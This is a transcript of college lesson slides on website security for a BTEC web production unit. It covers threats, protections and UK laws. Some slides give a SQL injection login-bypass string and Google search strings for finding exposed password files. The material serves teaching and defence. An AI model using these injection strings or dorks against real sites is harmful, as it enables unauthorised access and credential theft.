Unit 28 Website Productionwiki.computing.hct.ac.uk/_media/computing/btec/level3/... ·...
Transcript of Unit 28 Website Productionwiki.computing.hct.ac.uk/_media/computing/btec/level3/... ·...
![Page 1: Unit 28 Website Productionwiki.computing.hct.ac.uk/_media/computing/btec/level3/... · 2015-02-25 · Problems Identify any security issues on advanced websites Online payments Intercepting](https://reader034.fdocuments.in/reader034/viewer/2022042122/5e9c85265111b96fae616f46/html5/thumbnails/1.jpg)
Unit 28
Website Production
Website security
Problems and resolutions
25 February 2015
![Page 2: Unit 28 Website Productionwiki.computing.hct.ac.uk/_media/computing/btec/level3/... · 2015-02-25 · Problems Identify any security issues on advanced websites Online payments Intercepting](https://reader034.fdocuments.in/reader034/viewer/2022042122/5e9c85265111b96fae616f46/html5/thumbnails/2.jpg)
What are the threats?
June 18th 2014, The Sunday Times & The Sun websites
![Page 3: Unit 28 Website Productionwiki.computing.hct.ac.uk/_media/computing/btec/level3/... · 2015-02-25 · Problems Identify any security issues on advanced websites Online payments Intercepting](https://reader034.fdocuments.in/reader034/viewer/2022042122/5e9c85265111b96fae616f46/html5/thumbnails/3.jpg)
Problems
Identify any security issues on advanced websites
Online payments
Intercepting data – Theft of information in transit
Changing data
Hacking username and passwords
Getting information from Cookies
Use of insecure OS
Authentication access to server
Undeleted files
Weak encryption codes
![Page 4: Unit 28 Website Productionwiki.computing.hct.ac.uk/_media/computing/btec/level3/... · 2015-02-25 · Problems Identify any security issues on advanced websites Online payments Intercepting](https://reader034.fdocuments.in/reader034/viewer/2022042122/5e9c85265111b96fae616f46/html5/thumbnails/4.jpg)
Solutions
Firewalls
Encryption and Secure Socket Layer (SSL)
Monitoring applications
SPAM Prevention:
File naming
Use strong passwords
Website certificates – validates organisation
![Page 5: Unit 28 Website Productionwiki.computing.hct.ac.uk/_media/computing/btec/level3/... · 2015-02-25 · Problems Identify any security issues on advanced websites Online payments Intercepting](https://reader034.fdocuments.in/reader034/viewer/2022042122/5e9c85265111b96fae616f46/html5/thumbnails/5.jpg)
SQL injection
Inserting SQL commands into username and
login textboxes
Username
Password
www.cmswire.com/cms/web-cms/how-they-hack-your-website-overview-of-common-techniques-002339.php
SELECT * FROM users WHERE username = ?USRTEXT '
AND password = ?PASSTEXT?
![Page 6: Unit 28 Website Productionwiki.computing.hct.ac.uk/_media/computing/btec/level3/... · 2015-02-25 · Problems Identify any security issues on advanced websites Online payments Intercepting](https://reader034.fdocuments.in/reader034/viewer/2022042122/5e9c85265111b96fae616f46/html5/thumbnails/6.jpg)
SQL injection
Inserting SQL commands into username and
login textboxes
`OR 1=1 — Username
Password
www.cmswire.com/cms/web-cms/how-they-hack-your-website-overview-of-common-techniques-002339.php
-- signifies ‘comment’
‘ closes the username text field
SELECT * FROM users WHERE username = '' OR 1=1
![Page 7: Unit 28 Website Productionwiki.computing.hct.ac.uk/_media/computing/btec/level3/... · 2015-02-25 · Problems Identify any security issues on advanced websites Online payments Intercepting](https://reader034.fdocuments.in/reader034/viewer/2022042122/5e9c85265111b96fae616f46/html5/thumbnails/7.jpg)
Google hacks
Get password text files
Some passwords are held in password text
files
inurl:passwd.txt
inurl:passlist.txt
“login: *” “password= *” filetype:xls
![Page 8: Unit 28 Website Productionwiki.computing.hct.ac.uk/_media/computing/btec/level3/... · 2015-02-25 · Problems Identify any security issues on advanced websites Online payments Intercepting](https://reader034.fdocuments.in/reader034/viewer/2022042122/5e9c85265111b96fae616f46/html5/thumbnails/8.jpg)
Cross Site Scripting attacks -
XSS
Some websites store username and
password in Cookies
XSS gets username and password from the
Cookie
![Page 9: Unit 28 Website Productionwiki.computing.hct.ac.uk/_media/computing/btec/level3/... · 2015-02-25 · Problems Identify any security issues on advanced websites Online payments Intercepting](https://reader034.fdocuments.in/reader034/viewer/2022042122/5e9c85265111b96fae616f46/html5/thumbnails/9.jpg)
Protection mechanisms
the most important thing after its creation
must be implemented at the stage of development
individual approach taking into consideration: the specific character of the particular web
project.
![Page 10: Unit 28 Website Productionwiki.computing.hct.ac.uk/_media/computing/btec/level3/... · 2015-02-25 · Problems Identify any security issues on advanced websites Online payments Intercepting](https://reader034.fdocuments.in/reader034/viewer/2022042122/5e9c85265111b96fae616f46/html5/thumbnails/10.jpg)
Protection
No method is 100% foolproof
Majority of attacks are automated -
Block vulnerability checking
Forensically test and recover
http://www.decision-web-design.com/security-
hacking-articles/prevention
![Page 11: Unit 28 Website Productionwiki.computing.hct.ac.uk/_media/computing/btec/level3/... · 2015-02-25 · Problems Identify any security issues on advanced websites Online payments Intercepting](https://reader034.fdocuments.in/reader034/viewer/2022042122/5e9c85265111b96fae616f46/html5/thumbnails/11.jpg)
Protection
Code scanning – check for unauthorised changes
Known exploits and technique checking
.HTACCESS files
DNS blacklists
Hosting
File & directory permissions
Penetration testing
CAPTCHAS
DDoS – cloud hosting?
Separate files for sensitive data
Be careful with Client-side scripting
![Page 12: Unit 28 Website Productionwiki.computing.hct.ac.uk/_media/computing/btec/level3/... · 2015-02-25 · Problems Identify any security issues on advanced websites Online payments Intercepting](https://reader034.fdocuments.in/reader034/viewer/2022042122/5e9c85265111b96fae616f46/html5/thumbnails/12.jpg)
High security level for:
website content,
user accounts,
confidential information collected from users
and protection of admin control from illegal capturing.
![Page 13: Unit 28 Website Productionwiki.computing.hct.ac.uk/_media/computing/btec/level3/... · 2015-02-25 · Problems Identify any security issues on advanced websites Online payments Intercepting](https://reader034.fdocuments.in/reader034/viewer/2022042122/5e9c85265111b96fae616f46/html5/thumbnails/13.jpg)
Requirements
protection from:
spam,
automatic form submission,
use of single account by multiple users, etc.
Also:
not decrease website usability by multiple authorization procedures or slow malicious-code testing mechanisms.
High level of convenience for users.
![Page 14: Unit 28 Website Productionwiki.computing.hct.ac.uk/_media/computing/btec/level3/... · 2015-02-25 · Problems Identify any security issues on advanced websites Online payments Intercepting](https://reader034.fdocuments.in/reader034/viewer/2022042122/5e9c85265111b96fae616f46/html5/thumbnails/14.jpg)
Methods
encoding of HTML-code or its key parts.
Access control password system
must be invisible through web code i.e. it must be saved in separate file or
database on a web server.
![Page 15: Unit 28 Website Productionwiki.computing.hct.ac.uk/_media/computing/btec/level3/... · 2015-02-25 · Problems Identify any security issues on advanced websites Online payments Intercepting](https://reader034.fdocuments.in/reader034/viewer/2022042122/5e9c85265111b96fae616f46/html5/thumbnails/15.jpg)
security for site users
Unreliable security system can badly influence your business reputation.
complete protection for users’ personal data,
Much of website protection depends on your hosting service.
![Page 16: Unit 28 Website Productionwiki.computing.hct.ac.uk/_media/computing/btec/level3/... · 2015-02-25 · Problems Identify any security issues on advanced websites Online payments Intercepting](https://reader034.fdocuments.in/reader034/viewer/2022042122/5e9c85265111b96fae616f46/html5/thumbnails/16.jpg)
TASK
describe the general security risks which
threaten the integrity of data.
![Page 17: Unit 28 Website Productionwiki.computing.hct.ac.uk/_media/computing/btec/level3/... · 2015-02-25 · Problems Identify any security issues on advanced websites Online payments Intercepting](https://reader034.fdocuments.in/reader034/viewer/2022042122/5e9c85265111b96fae616f46/html5/thumbnails/17.jpg)
Laws and guidelines
Data Protection Act (1998).
Copyright, Designs and Patents Act (1988)
Disability Discrimination Act(1995).
![Page 18: Unit 28 Website Productionwiki.computing.hct.ac.uk/_media/computing/btec/level3/... · 2015-02-25 · Problems Identify any security issues on advanced websites Online payments Intercepting](https://reader034.fdocuments.in/reader034/viewer/2022042122/5e9c85265111b96fae616f46/html5/thumbnails/18.jpg)
Data Protection Act (1998).
Protects personal information
Information Commissioner
8 principles
Do not allow data to be passed outside the
EU, other than country with laws equivalent
to EU
![Page 19: Unit 28 Website Productionwiki.computing.hct.ac.uk/_media/computing/btec/level3/... · 2015-02-25 · Problems Identify any security issues on advanced websites Online payments Intercepting](https://reader034.fdocuments.in/reader034/viewer/2022042122/5e9c85265111b96fae616f46/html5/thumbnails/19.jpg)
Copyright, Designs and
Patents Act (1988)
Copyright – protection of intellectual property
©
![Page 20: Unit 28 Website Productionwiki.computing.hct.ac.uk/_media/computing/btec/level3/... · 2015-02-25 · Problems Identify any security issues on advanced websites Online payments Intercepting](https://reader034.fdocuments.in/reader034/viewer/2022042122/5e9c85265111b96fae616f46/html5/thumbnails/20.jpg)
Disability Discrimination
Act(1995).
Must provide accessibility for your website
![Page 21: Unit 28 Website Productionwiki.computing.hct.ac.uk/_media/computing/btec/level3/... · 2015-02-25 · Problems Identify any security issues on advanced websites Online payments Intercepting](https://reader034.fdocuments.in/reader034/viewer/2022042122/5e9c85265111b96fae616f46/html5/thumbnails/21.jpg)
Task
define the laws and guidelines which various
types of web-site must conform to.